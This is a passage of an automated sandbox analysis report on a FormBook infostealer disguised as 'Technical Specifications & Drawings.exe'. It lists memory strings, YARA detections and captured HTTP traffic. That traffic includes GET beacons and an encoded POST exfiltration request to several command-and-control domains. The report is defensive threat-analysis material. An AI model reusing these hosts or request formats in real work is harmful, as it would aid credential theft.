Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: control.exe, 00000013.00000002.518695747.0000000004AB2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: control.exe, 00000013.00000002.517362036.000000000473B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
Source: unknown HTTP traffic detected: POST /02pi/ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.mexc-event-partner.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mexc-event-partner.site/02pi/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 5a 4c 30 3d 44 76 79 6b 59 68 57 49 4d 35 4c 42 4a 6a 4d 50 6a 54 75 63 62 57 6d 55 44 47 6a 73 66 32 46 4f 72 53 64 48 57 70 34 47 61 33 74 68 66 6a 38 75 79 5f 54 78 59 47 53 44 75 33 62 4c 39 42 7a 62 39 47 57 70 74 79 46 63 62 75 70 69 6f 68 6f 32 6d 5a 51 56 77 5a 7e 45 62 35 42 51 71 64 43 78 66 72 6f 78 42 49 62 70 39 44 47 75 43 31 5a 30 69 52 7a 49 4d 53 7a 7a 32 78 43 77 6d 76 61 52 4e 31 7a 49 62 44 50 49 4d 5f 62 72 31 33 36 6b 6d 7a 39 35 4e 67 61 62 55 51 4a 31 6b 50 63 62 41 55 71 63 37 55 45 52 32 73 48 51 55 66 46 65 5a 46 4f 7a 35 4e 4e 35 7a 68 6b 4a 6b 50 6b 35 57 53 37 6a 28 47 52 42 41 71 49 7a 64 74 78 42 54 72 46 39 36 4c 77 2d 57 32 63 52 66 32 63 57 74 31 28 5f 4b 43 54 63 65 35 74 43 76 64 59 53 45 5f 6f 36 59 31 59 2d 41 79 45 43 4f 36 6e 73 66 6e 71 72 39 4d 35 34 6d 44 79 6f 39 47 71 66 4f 48 6c 58 37 74 41 41 7a 32 51 4a 71 51 41 63 33 52 49 4f 45 2d 42 64 71 4a 48 6c 69 37 6b 68 41 6c 45 4f 6d 68 6a 72 35 37 6b 71 6e 4e 55 6f 6e 4e 66 4f 51 70 48 43 58 79 67 71 66 58 67 68 77 34 71 52 56 47 6c 61 38 50 50 57 5a 63 4c 6c 7e 38 65 44 72 52 57 79 48 4a 59 70 30 53 4a 41 56 59 6c 76 6d 33 33 33 6c 6f 4f 2d 6b 6b 54 2d 63 69 57 52 79 36 54 35 7a 51 79 71 52 6f 44 4c 6d 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ZL0=DvykYhWIM5LBJjMPjTucbWmUDGjsf2FOrSdHWp4Ga3thfj8uy_TxYGSDu3bL9Bzb9GWptyFcbupioho2mZQVwZ~Eb5BQqdCxfroxBIbp9DGuC1Z0iRzIMSzz2xCwmvaRN1zIbDPIM_br136kmz95NgabUQJ1kPcbAUqc7UER2sHQUfFeZFOz5NN5zhkJkPk5WS7j(GRBAqIzdtxBTrF96Lw-W2cRf2cWt1(_KCTce5tCvdYSE_o6Y1Y-AyECO6nsfnqr9M54mDyo9GqfOHlX7tAAz2QJqQAc3RIOE-BdqJHli7khAlEOmhjr57kqnNUonNfOQpHCXygqfXghw4qRVGla8PPWZcLl~8eDrRWyHJYp0SJAVYlvm333loO-kkT-ciWRy6T5zQyqRoDLmA).
Source: unknown DNS traffic detected: queries for: www.kirchhoff-darryl.com
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1Host: www.kirchhoff-darryl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1Host: www.tomoptique.frConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1Host: www.boshi-eg.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1Host: www.esandcraic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 5084, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: control.exe PID: 1896, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Uses 32bit PE files
Source: Technical Specifications & Drawings.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 5084, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: control.exe PID: 1896, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 0_2_00E7CD04 0_2_00E7CD04
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 0_2_00E7F0D0 0_2_00E7F0D0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 0_2_00E7F077 0_2_00E7F077
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 0_2_028E0C10 0_2_028E0C10
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 0_2_028E0C40 0_2_028E0C40
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 0_2_028E40D1 0_2_028E40D1
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017C4120 4_2_017C4120
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017AF900 4_2_017AF900
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017C99BF 4_2_017C99BF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018720A8 4_2_018720A8
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA830 4_2_017CA830
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018728EC 4_2_018728EC
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861002 4_2_01861002
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0187E824 4_2_0187E824
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D20A0 4_2_017D20A0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017BB090 4_2_017BB090
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CAB40 4_2_017CAB40
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186DBD2 4_2_0186DBD2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018603DA 4_2_018603DA
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018523E3 4_2_018523E3
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DABD8 4_2_017DABD8
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01872B28 4_2_01872B28
